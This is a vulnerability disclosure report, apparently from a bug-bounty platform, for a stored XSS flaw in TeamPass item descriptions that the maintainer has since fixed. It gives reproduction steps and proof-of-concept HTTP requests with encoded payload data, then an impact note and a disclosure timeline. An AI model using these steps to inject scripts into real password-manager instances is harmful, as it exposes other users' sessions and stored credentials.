Stored XSS on function item with folder in nilsteampassnet/teampass

Valid

Reported on

Apr 5th 2023

Description

Create two account and allow same folder.
one account create a new item in folder. in description parameter select code view and paste payload XSS.
Save and click on item will show a alert XSS. Other account login and view folder click on item and see a alert XSS

Proof of Concept

git clone project and setup
lastest commit: f6416bd763f99b1016a3991c17a49efb0e853294


Example Image Create:

POST /teampass/sources/items.queries.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1610
Origin: http://localhost
Connection: close
Referer: http://localhost/teampass/index.php?page=items
Cookie: c8d6b9a0a8b4543c794b1fef4252e207b01f3b097a77a2c032=3dadb4413c2b2092a59dfb98885b0289b89236ac65a4969878; teampass_session=53614e3s2bermcqa1pndeju249; jstree_select=4
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

type=new_item&data=eyJjaXBoZXJ0ZXh0Ijoicm1JUHFsTFdtdXNVZ2JmZ2xWMnhWQnYyd2dlM0hzUi9QNGl5U2JJWGo5UkdiVHo2NlJtSHMweW5WU3E1V3BFNC9nL2xkQS9KVFM3MDNGZUhjK2RMSFRnQkdJcUxrbm9zOVZqZUtlWTF3OUY2TkxJbFFQWjFvRnFCaHVrVDcyYXltTS9UQ0d0YW1sTmE1dGlXOG1BNlBHRTNqemFhQjlEZ2hCUHZuYU5JdEtsMXhjRHM3R1JsWEFBa1RoTkdMWkRqNlk2d2lFYU11NVJ4K2lZLzBmT3dEN0F4d01hcU9saWhaOWJXUkpqMHFqb2JJUjJmNUlFQWdkUCthTTQvbWRtTllNeUczL01TYWZLRWtqdHJuL0ZnQ2h2K1NjbnZFc01xV0FYdnBid1V1NWtpRENycGIrOUhrWVVQdGFSRkNBbmNPL3pIUk8xVE5xcHUyaU1KbzdqS0xLcmQzbFEzdEhXdzhtV1pzdkRwb20xdVFtZGNhSFZaNHhZVzdyNTFNdEtLS09hdFlRQ3kwbmNvN2kzbi9NS0crQWlzSnl5TXphL2RGdjgvOUtHcS9GbFc3MEorVVR5VzF1M21QU0NBYm5MY1FNYWt3R1AxL2E1NFQrKzhQb3NBK2pIYzBGZGlWNVVXL3JueXpTRkF4cnhOOUFjaC95dWJ4YlBHSnRmQkJxQUFYVlRoQkpySXpRZzBqUGFhaEJzdnpGMmd0ZEtGS1lNTVBVc1RRUHR6YS9BPSIsIml2IjoiMjk4NTk3MjY1ODE0OTM1ZDU0NDY1MzEwYzY2Mjc0MTUiLCJzYWx0IjoiN2Q1ODljNmJlYzg5MGE0MjgzNGFhNDlmZTc5ZjcxMmI5MDNiNmJlNjU1NDJkOGYwMzVmMTg3MDM0ZWFiMzFlMzVmZmEwNGVkZTlhZjY2ZDg5Nzg4ZTU0MjRkOWQ1MmZjNDU2YzIxYjIzZGQ5MGU5ODNkMTc2ZTJjMGFjNjk4YTlkZjcxNjEwYjU3MGJiODM5ZTBhODMyMjQ4NmI5ZGJlMTg4YzM3NWNlNjNkOTRiMzAzYWMyOTIxMTk4NDJiNjg5NTc2YzIwZmIyZTEwZjhhYjQ4ZGYzOWIyNGJlYWFlZmYwYjJlNzI2NTBiZGY2MWI1OWZkZDg4MjIyMTJlNzAzNzU3NWNlNzAzYzA3NWM0N2JiYzg1OGNhYmNiN2MzNGZiZDFkZjc5YTQ5YzRlMTQ4ZTE2YmFlYTlkMWIyNWMxZWU4NWY3YzE1M2YyZTBlMzYzMzQzZjRmNGExNDJlNDI1YWE1MzhkZGE2MTAwNDQ2OTBiNTRkMTY2ODJiOWIyNGJkMDVkN2I1ZWUzNjRjYjRkYjc0NWZhOWJjMTBkMGMxNzkzN2ZkNWRmM2EyZTJkOWNkY2M1YzIyYjhiMjhmYzU0NGRkMzAxYWRhOTlmMWVlOWJmNjk1MTg5YzdkMDgwMDQwZWM3MmRmNDQ5NjQwOTUyM2QwM2E0Yzc4NmNlODFhYmMiLCJpdGVyYXRpb25zIjo5OTl9&key=3pCa7RTf3hpHgw2FVuxgvbky3Gcem42y4YzJa5q57yyAvhVL4X


Update:

POST /teampass/sources/items.queries.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1613
Origin: http://localhost
Connection: close
Referer: http://localhost/teampass/index.php?page=items
Cookie: c8d6b9a0a8b4543c794b1fef4252e207b01f3b097a77a2c032=3dadb4413c2b2092a59dfb98885b0289b89236ac65a4969878; teampass_session=53614e3s2bermcqa1pndeju249; jstree_select=4
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

type=update_item&data=eyJjaXBoZXJ0ZXh0IjoiZTFWYzdUNlVsSzhMQ2lEZ2ZCaUlpS0s5UThZTjRHNThNaE8wdkVsZUpzK0pkNmNjemZYVjUvdjNZQ3IyMExTanpjZTVLczNPTWdWMmNrcE1DN0ZsWGZQTDU1OGdKVzlXQnlydXdUTGswNlhoQ281RkkzZGFPZml4R3JXUHVMM3prMWQ5Q2g1emRJZzZyRE4rOUtYUDRBcWtPNE5FdWRweFdGUXlheE5YMmtJRmxaYjhSRlpOQ0Z3UU5iMll2eXZwQXZhVlVQNExROHQ4SHhGczBZVld6OGRIc1lzSWNHOFl2S3VxSEdKWi8zRDU2clVmYkthd01FeDVnS1kyL2VvWk0zMGhIRFRwRXN4RkJPZ05oaUxqZ21xOEw3RUFxT3lOTzRTL2lkRzQxa3hNaW9WNkpOV0ZLY0xkMHZScVhUeHVaNGx4cVR3aGh2NXN4NHVRUmJod2UvbSt1cjNhNDBFR0NMc0w3bW0xcVkyN2JUaVhvSHFCRXlRSy9uOU9ZeitNR215MmRDMUpiT2E2aEdiYlY1aW9uTW1aM0FTWUtzNjZoaXNNVnVFdUxDdmszNXZtMUZGL1RNa0NDamFOb0FrY0hOU01NdDFjL1ZWTmd4K2ZoRjA1VjZ4V3ZBS1YzZzRraDYwZmlWbjFxb1gyajVIcmxPcENlL01yWkNITnQ3eUtKckQxOUdyb3FYZmlWNHVoYi9VQXJabDhFaFVNYWpOSGFLWHZSNDVOVTJNPSIsIml2IjoiN2E0ZmMwMjIxYTgxMmNhYjExNjUxMjc5NDM3NWYxMmIiLCJzYWx0IjoiNGNiZjg3ODBhOGIzZTBmZmY2MzY3ODZjOGY3MjFiYjZhNTZiYTBlMzIxZTg5YjZmM2E1YjdiZWJiMzJiMWI2MjA3OGJiZGM5MzM1MzY4YTI4ZDRmZGM3NGI0MzJhODY2OTA0ZDlkYjc2ODcyZmZkNmU4MWE3MTA2NDMzYTEwODE1MGIyNWY5NDJiZmFjZGU0NWU2NmYwNWUzYzQ2MWIwYjM3NzkyZmExM2I2ZWQxNmU4MTc1ZjZmZjZlOTgxMGU5MTRjMGNhNDEwYzU3NTcwMzAxMzU0YmNlZDNhYmU4MjYyODU3NzBiN2E4ZGEwOGEwMjVkNTQ3YjY5MGE5MGNiZTg3ZTJmZTQ2MjY5Mjg0ZTk2NGMwN2E1NmMyZDNjODM5NzMwOTFkM2JjZThkYTM0ZWQ5Yjg5OGYyY2I3ZTA4NjQwM2VhYmU2MTgwMmU3NTgxYWU4OGM5NjgxY2I0OTYxNTA3MTExODJlZWEzMjFjNGQ2MGMwOTdmMGUxYzdiZGM5YzQ4YjAyM2JmYThmYWQwYzMyODljMjhiZjVlOTA2YWMxNjVkYTA5YjIwMjU5ZjUxYzYwZTg4ZDUyMDkzNmQxYTlmNjU4NzViNWE0ODIwMDdiMjkzMjhkYmM2NTBkMjlkNTg0NGUzNmYwYjI4NzFmYTkzZTM4YWE4NjY2Y2I1ZjQiLCJpdGVyYXRpb25zIjo5OTl9&key=3pCa7RTf3hpHgw2FVuxgvbky3Gcem42y4YzJa5q57yyAvhVL4X

Create item: Example Image

XSS Alert Example Image

Impact

If successful, a cross site scripting attack can severely impact websites and web applications, damage their reputation and relationships with customers. XXS can deface websites, can result in compromised user accounts, and can run malicious code on web pages, which can lead to a compromise of the user’s device.

We are processing your report and will contact the nilsteampassnet/teampass team within 24 hours. 2 months ago
TuanTH modified the report
2 months ago
We have contacted a member of the nilsteampassnet/teampass team and are waiting to hear back 2 months ago
nilsteampassnet/teampass maintainer has acknowledged this report a month ago
Nils Laumaillé validated this vulnerability a month ago
TuanTH has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Nils Laumaillé marked this as fixed in 3.0.3 with commit 77c541 a month ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Apr 9th 2023
Nils Laumaillé published this vulnerability a month ago
items.queries.php#L147-L1917 has been validated
TuanTH
a month ago

Researcher

@nilsteampassnet, i checked on commit 77c541a0151841d1f4ceb0a84ca391e1b526d58d. This issue was fixed

to join this conversation